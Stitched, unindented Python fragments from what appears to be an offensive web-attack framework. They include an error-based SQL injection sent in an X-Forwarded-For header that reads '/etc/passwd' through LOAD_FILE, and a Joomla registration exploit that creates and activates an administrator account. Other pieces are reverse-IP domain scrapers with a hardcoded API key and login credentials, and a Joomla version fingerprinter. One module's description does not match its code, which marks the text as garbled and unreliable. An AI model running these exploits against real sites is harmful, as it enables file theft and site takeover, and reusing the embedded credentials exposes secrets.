def Whoiswebhosting(self, searcher):
req = HTTP(searcher['URL'])
urls = []
data = req.Request(searcher['URL'] % (self.ip, 1))
last = search(
r'\?pi=([0-9]+)\&ob=SLD\&oo=DESC">\ \;\ \;Last\ \;>\>\;<\/a>',
data)
url = findall(
r'<td><a href="http:\/\/whois\.webhosting\.info\/.*?\.">(.*?)\.<\/a><\/td>',
data)
urls += url
if last:
page = last.group(1)
for i in range(2, int(page)):
data = req.Request(searcher['URL'] % (self.ip, i))
if search(
'The security key helps us prevent automated searches',
data):
break
url = findall(
r'<td><a href="http:\/\/whois\.webhosting\.info\/.*?\.">(.*?)\.<\/a><\/td>',
data)
urls += url
self.frmwk.print_status(
self.fmt_string.format(searcher['SITE'], urls.__len__()))
self.domains += urls
else:
self.frmwk.print_status(
self.fmt_string.format(searcher['SITE'], urls.__len__()))
self.domains += urls
def BingApi(self, searcher):
KEY = "49EB4B94127F7C7836C96DEB3F2CD8A6D12BDB71"
req = HTTP(searcher['URL'])
data = req.Request(searcher['URL'] % (KEY, self.ip, 0))
total = search('<web:Total>([0-9]+)<\/web:Total>', data).group(1)
page = int(int(total) / 50 + 1)
for i in range(1, page):
data += req.Request(searcher['URL'] % (KEY, self.ip, i))
result = findall(r'<web:Url>(.+?)<\/web:Url>', data)
urls = []
for url in result:
urls.append(url.split('/', 3)[2])
self.frmwk.print_status(
self.fmt_string.format(searcher['SITE'], urls.__len__()))
self.domains += urls
class Module(Templates):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.version = 1
self.author = [ 'Kid' ]
self.description = 'Get Basic Meter Information By Reading Tables'
self.detailed_description = 'This module retreives some basic meter information and displays it in a human-readable way.'
self.options.addString('FILE', 'domain/ip', default = '/etc/passwd')
def run(self, frmwk, args):
url = 'http://www.google.com/'
self.victim = HTTP(url)
len = 1
# join = ''
while True:
header = {'x-forwarded-for': "1' order by (SELECT 1 from (select count(*),concat(floor(rand(0)*2),(substring((select(LOAD_FILE('%s'))),%s,62)))a from information_schema.tables group by a)b);-- -'" % (self.options['FILE'], len)}
data = self.victim.Request(url, 'POST', "uname=administrator&upass=12345612345&Submit=+++Login+++",header = header)
# print(data)
res = search("Duplicate entry '.(.*?)' for key ", data, DOTALL)
if res:
# join += res.group(1)
stdout.write(res.group(1))
stdout.flush()
else:
break
len += 62
# print('--------------data---------- : \n' + join)
def run(self, frmwk, args):
url = self.options['URL']
email = CONFIG.GMAIL_ACCOUNT[0]
self.username = '******' + str(randint(1000,100000))
self.password = '******'
victim = HTTP(url)
victim.storecookie = True
exploit = 'jform%5Bname%5D=exploit&jform%5Busername%5D=exploit&jform%5Bpassword1%5D=123123&jform%5Bpassword2%5D=1231233&jform%5Bemail1%5D=pentest%40yahoo.com&jform%5Bemail2%5D=pentest%40yahoo.com&option=com_users&task=registration.register&jform%5Bgroups%5D%5B%5D=7&'
registry = 'jform%5Bname%5D={0}&jform%5Busername%5D={0}&jform%5Bpassword1%5D={1}&jform%5Bpassword2%5D={1}&jform%5Bemail1%5D={2}&jform%5Bemail2%5D={2}&option=com_users&task=registration.register&jform%5Bgroups%5D%5B%5D=7&'.format(self.username, self.password, email)
frmwk.print_status('Init token')
data = victim.Request(url)
token = search('name="([a-zA-Z0-9]{32})"\svalue="1"', data)
if token:
token = token.group(1)
else:
token = ''
frmwk.print_status('Send false request')
url = url + '?task=registration.register'
victim.Request(url, 'POST', exploit + token + '=1')
frmwk.print_status('Send exploit request')
data = victim.Request(url, 'POST', registry + token + '=1')
warning = search('class="warning\smessage">(.*?)</dd>', data, DOTALL)
message = search('class="message\smessage">(.*?)</dd>', data, DOTALL)
if warning:
frmwk.print_error('Error during exploit : ' + warning.group(1))
return
elif message:
frmwk.print_success('Successful : ' + message.group(1).strip())
frmwk.print_success('Account login: %s | %s' % (self.username, self.password))
else:
frmwk.print_status('Hên xui !')
frmwk.print_status('Sleep 30s for mail receiver !')
sleep(30)
for email in self.getMail():
active = search('(http(.*?)activate&token=(.*?))\s', email['body'], DOTALL)
if active:
active_link = active.group(1)
frmwk.print_status('Active link: ' + active_link)
break
if active_link:
data = victim.Request(active_link)
message = search('class="message\smessage">(.*?)</dd>', data, DOTALL)
if message:
frmwk.print_success('Actived Account: %s | %s' % (self.username, self.password))
def eWhois(self, searcher):
params = urlencode({
'_method': 'POST',
'data[User][email]': '*****@*****.**',
'data[User][password]': 'RitX:::R1tX',
'data[User][remember_me]': '0'
})
req = HTTP("http://www.ewhois.com/")
req.storecookie = True
req.rand_useragent = False
data = req.Request('http://www.ewhois.com/login/', 'POST', params)
data = req.Request("http://www.ewhois.com/export/ip-address/%s/" %
self.ip)
urls = findall(r'"(.*?)","","","[UA\-[0-9]+\-[0-9]+|]",""', data)
self.frmwk.print_status(
self.fmt_string.format(searcher['SITE'], urls.__len__()))
self.domains += urls
def reverseip(self, searcher):
try:
if 'SP' not in searcher:
req = HTTP(searcher['URL'])
if 'DATA' in searcher:
data = req.Request(searcher['URL'], 'POST',
searcher['DATA'] % self.ip)
else:
data = req.Request(searcher['URL'] % self.ip)
urls = findall(searcher['REGEX'], data)
self.frmwk.print_status(
self.fmt_string.format(searcher['SITE'], urls.__len__()))
self.domains += urls
else:
searcher['SP'](searcher)
except Exception as e:
pass
class Searcher(Thread):
"""docstring for Searcher"""
def __init__(self, host, keyworld, limit, delay):
super().__init__()
self.keyworld = quote_plus(keyworld)
self.limit = limit
self.delay = delay
self.request = HTTP(host, CONFIG.TIME_OUT, user_agents_type='bot')
self.count = 0
self.info = []
self.step = 10
def run(self):
while True:
printer.print_line('\t{0:<25} {1:d}'.format(self.name, self.count))
uri = self.uriCreater()
if not self.Has_Next(self.do_search(uri)):
break
if self.count <= 1:
break
self.count += self.step
if self.count >= self.limit:
break
sleep(self.delay)
def do_search(self, uri):
data = self.request.Request(uri)
#print("-----------data : %s" % data)
if data != '':
try:
info = self.Getdata(data)
except Exception as e:
printer.print_error('%s : Nothing to do !' % self.name)
pass
return ''
self.do_split(info)
return data
def do_split(self, info):
ifl = []
for i in info:
try:
ifl.append(self.Spliter(i.strip()))
except Exception as e:
printer.print_error('%s Error : %s\ncontent: %s' %
(self.name, e, i))
pass
self.info += ifl
self.step = len(ifl)
def run(self, frmwk, args):
self.version = None
url = self.options['URL']
if not url.endswith('/'):
url += '/'
###### dict from http://www.pepelux.org/programs/joomlascan/ #######
storeversion = [
[
'language/en-GB/en-GB.ini',
[[
'version 1.5.x 2005-10-30 14:10:00',
'1.5.0.Beta-1.5.0.Beta'
], ['9913 2008-01-09 21:28:35Z', '1.5.0.Stable-1.5.0.Stable'],
['9990 2008-02-05 21:54:06Z', '1.5.1.Stable-1.5.1.Stable'],
['10053 2008-02-21 18:57:54Z', '1.5.2.Stable-1.5.2.Stable'],
['10208 2008-04-17 16:43:15Z', '1.5.3.Stable'],
['10498 2008-07-04 00:05:36Z', '1.5.4.Stable-1.5.7.Stable'],
['11214 2008-10-26 01:29:04Z', '1.5.8.Stable-1.5.8.Stable'],
['11391 2009-01-04 13:35:50Z', '1.5.9.Stable-1.5.11.Stable'],
[
'Copyright (C) 2005 - 2010 Open Source Matters',
'1.5.16.Stable-1.5.20.Stable'
],
['Problem with Joomla site', '1.5.17.Stable-1.5.17.Stable'],
['17165 2010-05-17 15:59:19Z', '1.6.0.Beta1-1.6.0.Beta1'],
['17420 2010-05-31 11:14:10Z', '1.6.0.Beta2-1.6.0.Beta2'],
['17675 2010-06-14 10:20:52Z', '1.6.0.Beta3-1.6.0.Beta3'],
['17903 2010-06-28 01:52:11Z', '1.6.0.Beta4-1.6.0.Beta4'],
['18082 2010-07-12 01:02:52Z', '1.6.0.Beta5-1.6.0.Beta5'],
['18198 2010-07-21 00:58:13Z', '1.6.0.Beta6-1.6.0.Beta8'],
['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.1.Stable'],
['20990 2011-03-18 16:42:30Z', '1.6.2.Stable-1.7.5.Stable']]
],
[
'components/com_contact/metadata.xml',
[['8178 2007-07-23 05:39:47Z', '1.5.0.RC2-1.5.18.Stable'],
['17437 2010-06-01 14:35:04Z', '1.5.19.Stable-1.5.20.Stable'],
['16235 2010-04-20 04:13:25Z', '1.6.0.Stable-1.7.5.Stable']]
],
[
'htaccess.txt',
[['47 2005-09-15 02:55:27Z', '1.0.0-1.0.2'],
['423 2005-10-09 18:23:50Z', '1.0.3-1.0.3'],
['1005 2005-11-13 17:33:59Z', '1.0.4-1.0.5'],
['1570 2005-12-29 05:53:33Z', '1.0.6-1.0.7'],
['2368 2006-02-14 17:40:02Z', '1.0.8-1.0.9'],
['4085 2006-06-21 16:03:54Z', '1.0.10-1.0.10'],
['4756 2006-08-25 16:07:11Z', '1.0.11-1.0.11'],
['5973 2006-12-11 01:26:33Z', '1.0.12-1.0.12'],
['5975 2006-12-11 01:26:33Z', '1.0.13-1.0.14.RC1'],
['9317 2007-11-07 03:02:08Z', '1.5.0.RC4-1.5.0.Stable'],
['10492 2008-07-02 06:38:28Z', '1.5.0.Beta-1.5.14.Stable'],
['13415 2009-11-03 15:53:25Z', '1.5.15.Stable-1.5.15.Stable'],
['14401 2010-01-26 14:10:00Z', '1.5.16.Stable-1.5.20.Stable'],
['14276 2010-01-18 14:20:28Z', '1.6.0.Beta1-1.6.0.Beta8'],
['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.1.Stable'],
['21101 2011-04-07 15:47:33Z', '1.6.2.Stable-1.7.5.Stable']]
],
[
'administrator/language/en-GB/en-GB.ini',
[[
'version 1.5.x 2005-10-30 14:10:00',
'1.5.0.Beta-1.5.0.Beta'
], ['9869 2008-01-05 04:00:13Z', '1.5.0.Stable-1.5.0.Stable'],
['9990 2008-02-05 21:54:06Z', '1.5.1.Stable-1.5.1.Stable'],
['10122 2008-03-10 11:58:27Z', '1.5.2.Stable-1.5.2.Stable'],
['10186 2008-04-02 13:10:12Z', '1.5.3.Stable-1.5.3.Stable'],
['10500 2008-07-04 06:57:07Z', '1.5.4.Stable-1.5.4.Stable'],
['10571 2008-07-21 01:27:35Z', '1.5.5.Stable-1.5.7.Stable'],
['11213 2008-10-25 12:43:11Z', '1.5.8.Stable-1.5.8.Stable'],
['11391 2009-01-04 13:35:50Z', '1.5.9.Stable-1.5.9.Stable'],
['11667 2009-03-08 20:32:38Z', '1.5.10.Stable-1.5.10.Stable'],
['11799 2009-05-06 02:15:50Z', '1.5.11.Stable-1.5.11.Stable'],
['12308 2009-06-23 04:05:28Z', '1.5.12.Stable-1.5.14.Stable'],
['13243 2009-10-20 04:01:04Z', '1.5.15.Stable-1.5.15.Stable'],
['16380 2010-04-23 09:19:48Z', '1.5.16.Stable-1.5.20.Stable'],
['17165 2010-05-17 15:59:19Z', '1.6.0.Beta1-1.6.0.Beta1'],
['17387 2010-05-30 16:28:20Z', '1.6.0.Beta2-1.6.0.Beta2'],
['17675 2010-06-14 10:20:52Z', '1.6.0.Beta3-1.6.0.Beta3'],
['17898 2010-06-27 13:03:01Z', '1.6.0.Beta4-1.6.0.Beta4'],
['18090 2010-07-12 10:49:58Z', '1.6.0.Beta5-1.6.0.Beta5'],
['18198 2010-07-21 00:58:13Z', '1.6.0.Beta6-1.6.0.Beta6'],
['18378 2010-08-09 17:29:44Z', '1.6.0.Beta7-1.6.0.Beta7'],
['18572 2010-08-22 09:57:58Z', '1.6.0.Beta8-1.6.0.Beta8'],
['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.0.Stable'],
['20899 2011-03-07 20:56:09Z', '1.6.1.Stable-1.6.1.Stable'],
['20990 2011-03-18 16:42:30Z', '1.6.2.Stable-1.6.6.Stable'],
['21721 2011-07-01 08:48:47Z', '1.7.0.Stable-1.7.2.Stable'],
['22370 2011-11-09 16:18:06Z', '1.7.3.Stable-1.7.5.Stable']]
],
[
'language/en-GB/en-GB.com_media.ini',
[['10496 2008-07-03 07:08:39Z', '1.5.0.Beta-1.5.12.Stable'],
['12540 2009-07-22 17:34:44Z', '1.5.13.Stable-1.5.14.Stable'],
['13311 2009-10-24 04:13:49Z', '1.5.15.Stable-1.5.15.Stable'],
['14401 2010-01-26 14:10:00Z', '1.5.16.Stable-1.5.20.Stable'],
['17044 2010-05-14 09:52:50Z', '1.6.0.Beta1-1.6.0.Beta3'],
['17769 2010-06-20 01:50:48Z', '1.6.0.Beta4-1.6.0.Beta8'],
['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.6.Stable'],
['21660 2011-06-23 13:25:32Z', '1.7.0.Stable-1.7.0.Stable'],
['21948 2011-08-08 16:02:50Z', '1.7.1.Stable-1.7.5.Stable']]
],
[
'configuration.php-dist',
[['47 2005-09-15 02:55:27Z', '1.0.0-1.0.0'],
['217 2005-09-21 15:15:58Z', '1.0.1-1.0.2'],
['506 2005-10-13 05:49:24Z', '1.0.3-1.0.7'],
['2622 2006-02-26 04:16:09Z', '1.0.8-1.0.8'],
['3754 2006-05-31 12:08:37Z', '1.0.9-1.0.10'],
['4802 2006-08-28 16:18:33Z', '1.0.11-1.0.12'],
['7424 2007-05-17 15:56:10Z', '1.0.13-1.0.15'],
['9991 2008-02-05 22:13:22Z', '1.5.0.Stable-1.5.8.Stable'],
['11409 2009-01-10 02:27:08Z', '1.5.9.Stable-1.5.9.Stable'],
['11687 2009-03-11 17:49:23Z', '1.5.10.Stable-1.5.15.Stable'],
['14401 2010-01-26 14:10:00Z', '1.5.16.Stable-1.5.20.Stable']]
]
]
requester = HTTP(url)
for link in storeversion:
frmwk.print_status('Checking: ' + url + link[0])
data = requester.Request(url + link[0])
if requester.response.status == 200:
for vstr in link[1]:
if data.find(vstr[0]) != -1:
self.version = vstr[1]
break
if self.version:
break
if not self.version:
frmwk.print_status('Checking: ' + url + 'language/en-GB/en-GB.xml')
data = requester.Request(url + 'language/en-GB/en-GB.xml')
if requester.response.status == 200:
version = search('<version>(.*?)</version>', data)
if version:
self.version = version.group(1)
if not self.version:
frmwk.print_status('Checking: ' + url +
'components/com_mailto/mailto.xml')
data = requester.Request(url + 'components/com_mailto/mailto.xml')
if requester.response.status == 200:
version = search('<version>(.*?)</version>', data)
if version:
self.version = version.group(1)
if self.version:
frmwk.print_success('Fount version: ' + self.version)
else:
frmwk.print_error('Unknown version !')
